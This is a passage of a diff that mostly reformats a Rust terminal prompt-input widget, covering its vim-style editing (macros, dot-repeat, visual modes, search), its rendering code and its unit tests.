-                        self.text[before.len().min(self.text.len())..self.cursor.min(self.text.len())].to_string()
+                                      // Find the diff between before/after texts at current cursor
+                                      // Inserted = text[insert_start..cursor] but we don't track start.
+                                      // Approximate: whole text minus before, substring at cursor.
+                                      // Better: store cursor-at-entry and extract.
+                        self.text
+                            [before.len().min(self.text.len())..self.cursor.min(self.text.len())]
+                            .to_string()
                     } else {
                         String::new()
                     };
@@ -1740,7 +2209,8 @@ impl PromptInputState {
         // ---- Accumulate key into macro recording buffer ----
         if let Some(reg) = self.vim_macro_recording {
             // `q` in normal mode stops recording
-            if key == "q" && self.vim_mode == VimMode::Normal
+            if key == "q"
+                && self.vim_mode == VimMode::Normal
                 && self.vim_pending == VimPendingState::None
             {
                 self.stop_macro_recording();
@@ -1768,8 +2238,12 @@ impl PromptInputState {
                 match key {
                     "y" => {
                         // Yank current line to register
-                        let ls = self.text[..self.cursor].rfind('\n').map(|p| p + 1).unwrap_or(0);
-                        let le = self.text[self.cursor..].find('\n')
+                        let ls = self.text[..self.cursor]
+                            .rfind('\n')
+                            .map(|p| p + 1)
+                            .unwrap_or(0);
+                        let le = self.text[self.cursor..]
+                            .find('\n')
                             .map(|p| self.cursor + p + 1)
                             .unwrap_or(self.text.len());
                         let yanked = self.text[ls..le].to_string();
@@ -1778,8 +2252,12 @@ impl PromptInputState {
                     }
                     "d" => {
                         // Delete current line to register
-                        let ls = self.text[..self.cursor].rfind('\n').map(|p| p + 1).unwrap_or(0);
-                        let le = self.text[self.cursor..].find('\n')
+                        let ls = self.text[..self.cursor]
+                            .rfind('\n')
+                            .map(|p| p + 1)
+                            .unwrap_or(0);
+                        let le = self.text[self.cursor..]
+                            .find('\n')
                             .map(|p| self.cursor + p + 1)
                             .unwrap_or(self.text.len());
                         let deleted = self.text[ls..le].to_string();
@@ -1797,7 +2275,9 @@ impl PromptInputState {
                         // Paste from register after cursor
                         if let Some(buf) = self.paste_from_register(reg) {
                             let insert_pos = if self.cursor < self.text.len() {
-                                self.text[self.cursor..].char_indices().nth(1)
+                                self.text[self.cursor..]
+                                    .char_indices()
+                                    .nth(1)
                                     .map(|(b, _)| self.cursor + b)
                                     .unwrap_or(self.text.len())
                             } else {
@@ -1853,7 +2333,9 @@ impl PromptInputState {
                     // Replay each recorded key (avoid infinite loops by cloning)
                     for k in keys {
                         // Guard: don't replay if we somehow entered macro record for same reg
-                        if self.vim_macro_recording == Some(reg) { break; }
+                        if self.vim_macro_recording == Some(reg) {
+                            break;
+                        }
                         self.vim_command(&k.clone());
                     }
                 }
@@ -1863,7 +2345,8 @@ impl PromptInputState {
         }
 
         // ---- Dot-repeat `.` — replay last modifying action ----
-        if key == "." && self.vim_mode == VimMode::Normal
+        if key == "."
+            && self.vim_mode == VimMode::Normal
             && self.vim_pending == VimPendingState::None
         {
             if let Some(action) = self.vim_dot_action.clone() {
@@ -1879,15 +2362,21 @@ impl PromptInputState {
                         self.push_undo();
                         let mut deleted = 0usize;
                         while deleted < count && self.cursor < self.text.len() {
-                            let clen = self.text[self.cursor..].chars().next()
-                                .map(|c| c.len_utf8()).unwrap_or(1);
+                            let clen = self.text[self.cursor..]
+                                .chars()
+                                .next()
+                                .map(|c| c.len_utf8())
+                                .unwrap_or(1);
                             self.text.drain(self.cursor..self.cursor + clen);
                             deleted += 1;
                         }
                         self.normalize();
                         return;
                     }
-                    DotRepeatAction::Change { deleted: _del, inserted: ins } => {
+                    DotRepeatAction::Change {
+                        deleted: _del,
+                        inserted: ins,
+                    } => {
                         self.push_undo();
                         self.text.insert_str(self.cursor, &ins);
                         self.cursor += ins.len();
@@ -1897,9 +2386,13 @@ impl PromptInputState {
                     DotRepeatAction::ReplaceChar { ch } => {
                         if self.cursor < self.text.len() {
                             self.push_undo();
-                            let clen = self.text[self.cursor..].chars().next()
-                                .map(|c| c.len_utf8()).unwrap_or(1);
-                            self.text.replace_range(self.cursor..self.cursor + clen, &ch.to_string());
+                            let clen = self.text[self.cursor..]
+                                .chars()
+                                .next()
+                                .map(|c| c.len_utf8())
+                                .unwrap_or(1);
+                            self.text
+                                .replace_range(self.cursor..self.cursor + clen, &ch.to_string());
                             self.normalize();
                         }
                         return;
@@ -1914,7 +2407,10 @@ impl PromptInputState {
         let prev_text_len = self.text.len();
 
         // `u` — undo: restore previous text/cursor snapshot
-        if key == "u" && self.vim_mode == VimMode::Normal && self.vim_pending == VimPendingState::None {
+        if key == "u"
+            && self.vim_mode == VimMode::Normal
+            && self.vim_pending == VimPendingState::None
+        {
             if let Some((t, c)) = self.undo_stack.pop() {
                 self.text = t;
                 self.cursor = c;
@@ -1923,45 +2419,69 @@ impl PromptInputState {
             return;
         }
         // Enter visual mode with `v` — anchor the selection start
-        if key == "v" && self.vim_mode == VimMode::Normal && self.vim_pending == VimPendingState::None {
+        if key == "v"
+            && self.vim_mode == VimMode::Normal
+            && self.vim_pending == VimPendingState::None
+        {
             self.vim_mode = VimMode::Visual;
             self.visual_anchor = Some(self.cursor);
             return;
         }
         // Enter command-line mode with `:`
-        if key == ":" && self.vim_mode == VimMode::Normal && self.vim_pending == VimPendingState::None {
+        if key == ":"
+            && self.vim_mode == VimMode::Normal
+            && self.vim_pending == VimPendingState::None
+        {
             self.vim_mode = VimMode::Command;
             self.vim_command_buf.clear();
             return;
         }
         // Enter in-prompt search with `/`
-        if key == "/" && self.vim_mode == VimMode::Normal && self.vim_pending == VimPendingState::None {
+        if key == "/"
+            && self.vim_mode == VimMode::Normal
+            && self.vim_pending == VimPendingState::None
+        {
             self.vim_mode = VimMode::Search;
             self.vim_search_buf.clear();
             return;
         }
         // Enter visual-line mode with `V`
-        if key == "V" && self.vim_mode == VimMode::Normal && self.vim_pending == VimPendingState::None {
+        if key == "V"
+            && self.vim_mode == VimMode::Normal
+            && self.vim_pending == VimPendingState::None
+        {
             self.vim_mode = VimMode::VisualLine;
-            let ls = self.text[..self.cursor].rfind('\n').map(|p| p + 1).unwrap_or(0);
+            let ls = self.text[..self.cursor]
+                .rfind('\n')
+                .map(|p| p + 1)
+                .unwrap_or(0);
             self.visual_anchor = Some(ls);
             return;
         }
         // Enter visual-block mode with Ctrl+V
-        if key == "\x16" && self.vim_mode == VimMode::Normal && self.vim_pending == VimPendingState::None {
+        if key == "\x16"
+            && self.vim_mode == VimMode::Normal
+            && self.vim_pending == VimPendingState::None
+        {
             self.vim_mode = VimMode::VisualBlock;
             self.visual_anchor = Some(self.cursor);
             return;
         }
         // `n` — repeat last search forward
-        if key == "n" && self.vim_mode == VimMode::Normal && self.vim_pending == VimPendingState::None {
+        if key == "n"
+            && self.vim_mode == VimMode::Normal
+            && self.vim_pending == VimPendingState::None
+        {
             if let Some(pat) = self.vim_search_last.clone() {
                 self.vim_search_forward(&pat, 1);
             }
             return;
         }
         // `N` — repeat last search backward
-        if key == "N" && self.vim_mode == VimMode::Normal && self.vim_pending == VimPendingState::None {
+        if key == "N"
+            && self.vim_mode == VimMode::Normal
+            && self.vim_pending == VimPendingState::None
+        {
             if let Some(pat) = self.vim_search_last.clone() {
                 self.vim_search_backward(&pat);
             }
@@ -1994,7 +2514,8 @@ impl PromptInputState {
                         self.cursor = sel_start.min(self.text.len());
                         self.vim_mode = VimMode::Normal;
                         self.visual_anchor = None;
-                        self.vim_dot_action = Some(DotRepeatAction::DeleteChars { count: char_count });
+                        self.vim_dot_action =
+                            Some(DotRepeatAction::DeleteChars { count: char_count });
                         self.normalize();
                         return;
                     }
@@ -2020,7 +2541,11 @@ impl PromptInputState {
             if let Some(anchor) = self.visual_anchor {
                 let from = anchor.min(self.cursor);
                 let to_excl = anchor.max(self.cursor);
-                let to = self.text[to_excl..].char_indices().nth(1).map(|(b,_)| to_excl+b).unwrap_or(self.text.len());
+                let to = self.text[to_excl..]
+                    .char_indices()
+                    .nth(1)
+                    .map(|(b, _)| to_excl + b)
+                    .unwrap_or(self.text.len());
                 match key {
                     "y" => {
                         self.yank_buf = self.text[from..to].to_string();
@@ -2037,7 +2562,8 @@ impl PromptInputState {
                         self.cursor = from.min(self.text.len());
                         self.vim_mode = VimMode::Normal;
                         self.visual_anchor = None;
-                        self.vim_dot_action = Some(DotRepeatAction::DeleteChars { count: char_count });
+                        self.vim_dot_action =
+                            Some(DotRepeatAction::DeleteChars { count: char_count });
                         self.normalize();
                         return;
                     }
@@ -2061,7 +2587,11 @@ impl PromptInputState {
             if let Some(anchor) = self.visual_anchor {
                 let from = anchor.min(self.cursor);
                 let to_excl = anchor.max(self.cursor);
-                let to = self.text[to_excl..].char_indices().nth(1).map(|(b,_)| to_excl+b).unwrap_or(self.text.len());
+                let to = self.text[to_excl..]
+                    .char_indices()
+                    .nth(1)
+                    .map(|(b, _)| to_excl + b)
+                    .unwrap_or(self.text.len());
                 match key {
                     "y" => {
                         self.yank_buf = self.text[from..to].to_string();
@@ -2079,9 +2609,8 @@ impl PromptInputState {
                         self.cursor = from.min(self.text.len());
                         self.vim_mode = VimMode::Normal;
                         self.visual_anchor = None;
-                        self.vim_dot_action = Some(DotRepeatAction::DeleteChars {
-                            count: char_count,
-                        });
+                        self.vim_dot_action =
+                            Some(DotRepeatAction::DeleteChars { count: char_count });
                         self.normalize();
                         return;
                     }
@@ -2115,7 +2644,8 @@ impl PromptInputState {
             &mut self.last_find,
         );
         if modified {
-            self.undo_stack.push((snapshot_text.clone(), snapshot_cursor));
+            self.undo_stack
+                .push((snapshot_text.clone(), snapshot_cursor));
             if self.undo_stack.len() > 100 {
                 self.undo_stack.remove(0);
             }
@@ -2156,7 +2686,9 @@ impl PromptInputState {
         }
 
         // Update visual anchor tracking when in visual mode
-        if (self.vim_mode == VimMode::Visual || self.vim_mode == VimMode::VisualBlock) && self.visual_anchor.is_none() {
+        if (self.vim_mode == VimMode::Visual || self.vim_mode == VimMode::VisualBlock)
+            && self.visual_anchor.is_none()
+        {
             self.visual_anchor = Some(self.cursor);
         }
         self.normalize();
@@ -2186,7 +2718,8 @@ impl PromptInputState {
 
     /// Set mark `name` at the current cursor position.
     pub fn set_mark(&mut self, name: char) {
-        self.vim_marks.insert(name, (self.text.clone(), self.cursor));
+        self.vim_marks
+            .insert(name, (self.text.clone(), self.cursor));
     }
 
     /// Move cursor to the position recorded for mark `name`, if the text still matches.
@@ -2219,7 +2752,10 @@ impl PromptInputState {
 
     /// Return the recorded key sequence for `register`, or an empty vec.
     pub fn replay_macro(&self, register: char) -> Vec<String> {
-        self.vim_macro_content.get(&register).cloned().unwrap_or_default()
+        self.vim_macro_content
+            .get(&register)
+            .cloned()
+            .unwrap_or_default()
     }
 
     // ---- Vim command-line execution ----
@@ -2240,8 +2776,12 @@ impl PromptInputState {
                 // `:set vim` → enable, `:set novim` → disable (runtime toggle)
                 let arg = s["set ".len()..].trim();
                 match arg {
-                    "vim" => { self.vim_enabled = true; }
-                    "novim" => { self.vim_enabled = false; }
+                    "vim" => {
+                        self.vim_enabled = true;
+                    }
+                    "novim" => {
+                        self.vim_enabled = false;
+                    }
                     _ => {}
                 }
             }
@@ -2254,10 +2794,14 @@ impl PromptInputState {
     /// Move cursor to the next occurrence of `pattern` after `cursor + skip`.
     /// `skip = 0` finds from current position; `skip = 1` finds the *next* one.
     pub fn vim_search_forward(&mut self, pattern: &str, skip: usize) {
-        if pattern.is_empty() { return; }
+        if pattern.is_empty() {
+            return;
+        }
         let start = if skip > 0 {
             // Start after the current character to avoid re-matching same position
-            let next = self.text[self.cursor..].char_indices().nth(1)
+            let next = self.text[self.cursor..]
+                .char_indices()
+                .nth(1)
                 .map(|(b, _)| self.cursor + b)
                 .unwrap_or(0);
             next
@@ -2279,7 +2823,9 @@ impl PromptInputState {
 
     /// Move cursor to the previous occurrence of `pattern` before current cursor.
     pub fn vim_search_backward(&mut self, pattern: &str) {
-        if pattern.is_empty() { return; }
+        if pattern.is_empty() {
+            return;
+        }
         let text_lc = self.text.to_lowercase();
         let pat_lc = pattern.to_lowercase();
         // Find all occurrences, pick the last one before cursor
@@ -2321,7 +2867,10 @@ impl PromptInputState {
         if self.suggestions.is_empty() {
             self.suggestion_index = None;
         } else if self.text.starts_with('/') {
-            let idx = self.suggestion_index.unwrap_or(0).min(self.suggestions.len() - 1);
+            let idx = self
+                .suggestion_index
+                .unwrap_or(0)
+                .min(self.suggestions.len() - 1);
             self.suggestion_index = Some(idx);
         } else {
             self.suggestion_index = None;
@@ -2330,19 +2879,27 @@ impl PromptInputState {
 
     /// Select the next suggestion.
     pub fn suggestion_next(&mut self) {
-        if self.suggestions.is_empty() { return; }
+        if self.suggestions.is_empty() {
+            return;
+        }
         self.suggestion_index = Some(
-            self.suggestion_index.map_or(0, |i| (i + 1) % self.suggestions.len())
+            self.suggestion_index
+                .map_or(0, |i| (i + 1) % self.suggestions.len()),
         );
     }
 
     /// Select the previous suggestion.
     pub fn suggestion_prev(&mut self) {
-        if self.suggestions.is_empty() { return; }
-        self.suggestion_index = Some(
-            self.suggestion_index
-                .map_or(0, |i| if i == 0 { self.suggestions.len() - 1 } else { i - 1 })
-        );
+        if self.suggestions.is_empty() {
+            return;
+        }
+        self.suggestion_index = Some(self.suggestion_index.map_or(0, |i| {
+            if i == 0 {
+                self.suggestions.len() - 1
+            } else {
+                i - 1
+            }
+        }));
     }
 
     /// Accept the current suggestion.
@@ -2381,11 +2938,15 @@ impl PromptInputState {
         self.token_estimate = (self.text.len() + 3) / 4;
     }
 
-    pub fn is_empty(&self) -> bool { self.text.trim().is_empty() }
+    pub fn is_empty(&self) -> bool {
+        self.text.trim().is_empty()
+    }
 }
 
 impl Default for PromptInputState {
-    fn default() -> Self { Self::new() }
+    fn default() -> Self {
+        Self::new()
+    }
 }
 
 // ---------------------------------------------------------------------------
@@ -2403,7 +2964,11 @@ pub fn input_height(state: &PromptInputState) -> u16 {
     // top-line + text rows + bottom-line + 1 breathing-room row, at least 4, at most 12
     let base = ((line_count as u16) + 3).max(4).min(12);
     // +1 for image pill row when images are pending
-    base + if state.pending_images.is_empty() { 0 } else { 1 }
+    base + if state.pending_images.is_empty() {
+        0
+    } else {
+        1
+    }
 }
 
 /// Render the prompt input widget in the same low-chrome style as Claurst:
@@ -2425,7 +2990,12 @@ pub fn render_prompt_input(
     // If images are pending, render a pill row above everything else and shrink area.
     let (area, image_row_y) = if !state.pending_images.is_empty() && area.height > 1 {
         let pill_y = area.y;
-        let rest = Rect { x: area.x, y: area.y + 1, width: area.width, height: area.height - 1 };
+        let rest = Rect {
+            x: area.x,
+            y: area.y + 1,
+            width: area.width,
+            height: area.height - 1,
+        };
         (rest, Some(pill_y))
     } else {
         (area, None)
@@ -2435,22 +3005,32 @@ pub fn render_prompt_input(
         let mut pills: Vec<Span<'static>> = Vec::new();
         for img in &state.pending_images {
             let label = if let Some((w, h)) = img.dimensions {
-                format!(" \u{f03e} {} {}x{} ", img.label, w, h)  // nerd-font image icon, fallback to plain text
+                format!(" \u{f03e} {} {}x{} ", img.label, w, h) // nerd-font image icon, fallback to plain text
             } else {
                 format!(" \u{f03e} {} ", img.label)
             };
-            pills.push(Span::styled(label, Style::default().fg(Color::Black).bg(Color::Cyan)));
+            pills.push(Span::styled(
+                label,
+                Style::default().fg(Color::Black).bg(Color::Cyan),
+            ));
             pills.push(Span::raw(" "));
         }
         if !pills.is_empty() {
-            Paragraph::new(Line::from(pills))
-                .render(Rect { x: area.x, y: pill_y, width: area.width, height: 1 }, buf);
+            Paragraph::new(Line::from(pills)).render(
+                Rect {
+                    x: area.x,
+                    y: pill_y,
+                    width: area.width,
+                    height: 1,
+                },
+                buf,
+            );
         }
     }
 
     let accent = match mode {
-        InputMode::Readonly => CLAUDE_ORANGE,   // locked while streaming — always pink
-        _ => accent_override,                   // use mode-aware accent color
+        InputMode::Readonly => CLAUDE_ORANGE, // locked while streaming — always pink
+        _ => accent_override,                 // use mode-aware accent color
     };
     let prompt_prefix = format!("{PROMPT_POINTER} ");
     let prefix_width = prompt_prefix.chars().count() as u16;
@@ -2480,7 +3060,15 @@ pub fn render_prompt_input(
             "\u{2500}".repeat(area.width as usize),
             Style::default().fg(accent),
         )]))
-        .render(Rect { x: area.x, y: area.y, width: area.width, height: 1 }, buf);
+        .render(
+            Rect {
+                x: area.x,
+                y: area.y,
+                width: area.width,
+                height: 1,
+            },
+            buf,
+        );
     }
 
     // Text rows start 1 row below the top separator.
@@ -2489,7 +3077,11 @@ pub fn render_prompt_input(
     // Split into logical lines; guarantee at least one.
     let logical_lines: Vec<String> = {
         let collected: Vec<String> = full_content.lines().map(|l| l.to_string()).collect();
-        if collected.is_empty() { vec![String::new()] } else { collected }
+        if collected.is_empty() {
+            vec![String::new()]
+        } else {
+            collected
+        }
     };
 
     let text_style = if state.text.is_empty() && !focused {
@@ -2518,7 +3110,10 @@ pub fn render_prompt_input(
 
         let spans: Vec<Span<'static>> = if i == 0 {
             vec![
-                Span::styled(prompt_prefix.clone(), Style::default().fg(accent).add_modifier(Modifier::BOLD)),
+                Span::styled(
+                    prompt_prefix.clone(),
+                    Style::default().fg(accent).add_modifier(Modifier::BOLD),
+                ),
                 Span::styled(visible, text_style),
             ]
         } else {
@@ -2530,7 +3125,12 @@ pub fn render_prompt_input(
         };
 
         Paragraph::new(Line::from(spans)).render(
-            Rect { x: area.x, y: row_y, width: area.width, height: 1 },
+            Rect {
+                x: area.x,
+                y: row_y,
+                width: area.width,
+                height: 1,
+            },
             buf,
         );
     }
@@ -2540,11 +3140,17 @@ pub fn render_prompt_input(
     let cmd_line: Option<Line<'static>> = match state.vim_mode {
         VimMode::Command => {
             let buf_text = format!(":{}\u{2588}", state.vim_command_buf);
-            Some(Line::from(vec![Span::styled(buf_text, Style::default().fg(Color::Cyan))]))
+            Some(Line::from(vec![Span::styled(
+                buf_text,
+                Style::default().fg(Color::Cyan),
+            )]))
         }
         VimMode::Search => {
             let buf_text = format!("/{}\u{2588}", state.vim_search_buf);
-            Some(Line::from(vec![Span::styled(buf_text, Style::default().fg(Color::Yellow))]))
+            Some(Line::from(vec![Span::styled(
+                buf_text,
+                Style::default().fg(Color::Yellow),
+            )]))
         }
         _ => None,
     };
@@ -2560,7 +3166,12 @@ pub fn render_prompt_input(
     if let (Some(row), Some(cl)) = (cmdline_row, cmd_line) {
         if row < area.y + area.height {
             Paragraph::new(cl).render(
-                Rect { x: area.x, y: row, width: area.width, height: 1 },
+                Rect {
+                    x: area.x,
+                    y: row,
+                    width: area.width,
+                    height: 1,
+                },
                 buf,
             );
         }
@@ -2572,7 +3183,12 @@ pub fn render_prompt_input(
             Style::default().fg(accent),
         )]))
         .render(
-            Rect { x: area.x, y: underline_row, width: area.width, height: 1 },
+            Rect {
+                x: area.x,
+                y: underline_row,
+                width: area.width,
+                height: 1,
+            },
             buf,
         );
     }
@@ -2912,7 +3528,11 @@ mod tests {
 
     #[test]
     fn typeahead_slash_prefix_matches() {
-        let cmds = [("help", "Show help"), ("history", "Show history"), ("compact", "Compact")];
+        let cmds = [
+            ("help", "Show help"),
+            ("history", "Show history"),
+            ("compact", "Compact"),
+        ];
         let suggestions = compute_typeahead("/h", &cmds);
         assert_eq!(suggestions.len(), 2);
         assert_eq!(suggestions[0].text, "/help");
@@ -2948,7 +3568,11 @@ mod tests {
     #[test]
     fn suggestion_next_cycles() {
         let mut s = PromptInputState::new();
-        let cmds = [("help", "Help"), ("history", "History"), ("compact", "Compact")];
+        let cmds = [
+            ("help", "Help"),
+            ("history", "History"),
+            ("compact", "Compact"),
+        ];
         s.text = "/h".to_string();
         s.update_suggestions(&cmds);
         assert_eq!(s.suggestions.len(), 2);
@@ -2990,7 +3614,7 @@ mod tests {
     fn motion_w_basic() {
         assert_eq!(motion_w("hello world", 0), 6);
         assert_eq!(motion_w("hello world", 6), 11); // at start of 'world', moves to end
-        assert_eq!(motion_w("  foo", 0), 2);         // skip leading spaces
+        assert_eq!(motion_w("  foo", 0), 2); // skip leading spaces
     }
 
     #[test]
@@ -3001,7 +3625,7 @@ mod tests {
 
     #[test]
     fn motion_e_basic() {
-        assert_eq!(motion_e("hello world", 0), 4);  // cursor on 'h', end at 'o'
+        assert_eq!(motion_e("hello world", 0), 4); // cursor on 'h', end at 'o'
         assert_eq!(motion_e("hello world", 4), 10); // at 'o' (end), jump to 'd'
     }
 
@@ -3039,7 +3663,10 @@ mod tests {
     #[test]
     fn motion_find_char_f() {
         // f: cursor lands on 'o', count=1
-        assert_eq!(motion_find_char("hello", 0, 'o', VimFindKind::F, 1), Some(4));
+        assert_eq!(
+            motion_find_char("hello", 0, 'o', VimFindKind::F, 1),
+            Some(4)
+        );
         // f: not found
         assert_eq!(motion_find_char("hello", 0, 'z', VimFindKind::F, 1), None);
     }
@@ -3047,13 +3674,19 @@ mod tests {
     #[test]
     fn motion_find_char_t() {
         // t: cursor stops before 'o'
-        assert_eq!(motion_find_char("hello", 0, 'o', VimFindKind::T, 1), Some(3));
+        assert_eq!(
+            motion_find_char("hello", 0, 'o', VimFindKind::T, 1),
+            Some(3)
+        );
     }
 
     #[test]
     fn motion_find_char_bigF() {
         // F: search backward
-        assert_eq!(motion_find_char("hello", 4, 'h', VimFindKind::BigF, 1), Some(0));
+        assert_eq!(
+            motion_find_char("hello", 4, 'h', VimFindKind::BigF, 1),
+            Some(0)
+        );
     }
 
     // ---- apply_vim_key new commands ----------------------------------------
@@ -3066,7 +3699,15 @@ mod tests {
         let mut yank = String::new();
         let mut pending = VimPendingState::None;
         let mut last_find = None;
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "e", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "e",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert_eq!(cursor, 4); // end of 'hello'
     }
 
@@ -3078,7 +3719,15 @@ mod tests {
         let mut yank = String::new();
         let mut pending = VimPendingState::None;
         let mut last_find = None;
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "W", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "W",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert_eq!(cursor, 8); // 'baz'
     }
 
@@ -3090,7 +3739,15 @@ mod tests {
         let mut yank = String::new();
         let mut pending = VimPendingState::None;
         let mut last_find = None;
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "G", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "G",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert_eq!(cursor, 13); // start of 'third'
     }
 
@@ -3103,9 +3760,25 @@ mod tests {
         let mut pending = VimPendingState::None;
         let mut last_find = None;
         // 'g' sets pending G
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "g", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "g",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert!(matches!(pending, VimPendingState::G { .. }));
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "g", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "g",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert_eq!(cursor, 0);
     }
 
@@ -3118,9 +3791,25 @@ mod tests {
         let mut pending = VimPendingState::None;
         let mut last_find = None;
         // 3w — advance 3 words
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "3", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "3",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert!(matches!(pending, VimPendingState::Count { .. }));
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "w", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "w",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert_eq!(cursor, 6); // 3 words forward: a→b→c→d start = pos 6
     }
 
@@ -3132,9 +3821,31 @@ mod tests {
         let mut yank = String::new();
         let mut pending = VimPendingState::None;
         let mut last_find = None;
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "d", &mut yank, &mut pending, &mut last_find);
-        assert!(matches!(pending, VimPendingState::Operator { op: VimOperator::Delete, .. }));
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "w", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "d",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
+        assert!(matches!(
+            pending,
+            VimPendingState::Operator {
+                op: VimOperator::Delete,
+                ..
+            }
+        ));
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "w",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert_eq!(text, "world");
         assert_eq!(yank, "hello ");
     }
@@ -3147,8 +3858,24 @@ mod tests {
         let mut yank = String::new();
         let mut pending = VimPendingState::None;
         let mut last_find = None;
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "c", &mut yank, &mut pending, &mut last_find);
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "w", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "c",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "w",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert_eq!(mode, VimMode::Insert);
         assert_eq!(text, "world");
     }
@@ -3161,8 +3888,24 @@ mod tests {
         let mut yank = String::new();
         let mut pending = VimPendingState::None;
         let mut last_find = None;
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "d", &mut yank, &mut pending, &mut last_find);
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "d", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "d",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "d",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert_eq!(text, "second");
         assert_eq!(yank, "first\n");
     }
@@ -3175,9 +3918,25 @@ mod tests {
         let mut yank = String::new();
         let mut pending = VimPendingState::None;
         let mut last_find = None;
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "r", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "r",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert!(matches!(pending, VimPendingState::Replace { .. }));
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "H", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "H",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert_eq!(text, "Hello");
         assert_eq!(mode, VimMode::Normal); // stays in Normal after replace
     }
@@ -3190,8 +3949,24 @@ mod tests {
         let mut yank = String::new();
         let mut pending = VimPendingState::None;
         let mut last_find = None;
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "f", &mut yank, &mut pending, &mut last_find);
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "o", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "f",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "o",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert_eq!(cursor, 4); // first 'o' in 'hello'
         assert_eq!(last_find, Some((VimFindKind::F, 'o')));
     }
@@ -3204,10 +3979,34 @@ mod tests {
         let mut yank = String::new();
         let mut pending = VimPendingState::None;
         let mut last_find = None;
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "f", &mut yank, &mut pending, &mut last_find);
-        apply_vim_key(&mut mode, &mut text, &mut cursor, ".", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "f",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            ".",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert_eq!(cursor, 1);
-        apply_vim_key(&mut mode, &mut text, &mut cursor, ";", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            ";",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert_eq!(cursor, 3); // repeated find → next '.'
     }
 
@@ -3219,7 +4018,15 @@ mod tests {
         let mut yank = String::new();
         let mut pending = VimPendingState::None;
         let mut last_find = None;
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "X", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "X",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert_eq!(text, "helo");
         assert_eq!(cursor, 3);
     }
@@ -3232,7 +4039,15 @@ mod tests {
         let mut yank = String::new();
         let mut pending = VimPendingState::None;
         let mut last_find = None;
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "~", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "~",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert_eq!(text, "Hello");
